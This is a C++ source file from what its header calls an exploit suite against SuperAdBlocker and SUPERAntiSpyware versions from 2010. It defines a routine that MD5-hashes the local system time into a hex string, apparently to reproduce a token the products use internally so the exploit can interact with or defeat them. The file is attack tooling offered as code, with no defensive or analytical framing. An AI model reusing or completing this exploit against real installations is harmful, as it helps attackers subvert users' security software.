/*
* Copyright (c) 2010 by <milkovic.luka@gmail.com>
*
* SuperAdBlocker <= v4.6.1000 and SUPERAntiSpyware <= 4.34.1000 exploit suite
* --- by AelTHeGriN <aelthegrin@gmail.com> --- (Mar 2010)
*
*/

#include "StdAfx.h"
#include "MD5Initializator.h"
#include "../common/md5.h"

const DWORD MD5Initializator::MD5_BUFFER_SIZE = 64;
bool MD5Initializator::m_isInitialized = false;

void MD5Initializator::GetMD5HashedTime(OUT wchar_t *pOutputBuffer)
{
	assert(pOutputBuffer != NULL && "Cannot use NULL buffer for MD5 time storage!");

	// first obtain system time
	SYSTEMTIME sysTime;
	memset(&sysTime, 0, sizeof(sysTime));
	GetLocalTime(&sysTime);

	// initialize state for MD5
	md5_state_t md5state;
	memset(&md5state, 0, sizeof(md5state));
	md5_init(&md5state);

	// first hash
	md5_append(&md5state, (const md5_byte_t *)&sysTime, 4);

	// second hash
	md5_byte_t constData[MD5_BUFFER_SIZE] = {0};
	constData[0] = 128;
	DWORD nBytes = md5state.count[1] << 8 | md5state.count[0];
	__int64 nBytes2 = nBytes;
	nBytes = ((-9 - (nBytes >> 3))  & 0x3F)  + 1;
	md5_append(&md5state, constData, nBytes);

	// third hash
	md5_append(&md5state, (const md5_byte_t *) &nBytes2, 8);

	//md5_byte_t outputBytes[64] = {0};
	wchar_t *unicodeMD5Bytes = pOutputBuffer;

	// write md5state bytes in unicode buffer
	for(int index = 0; index < 16; index++)
	{
		int md5Bytes = *((DWORD *) ((BYTE *) &md5state + 4 * (index >> 2) + 8));
		int resultBytes = md5Bytes >> 8 * (index & 3);
		swprintf(unicodeMD5Bytes, L"%02x", (md5_byte_t) resultBytes);
		unicodeMD5Bytes += 2;
	}

	m_isInitialized = true;
}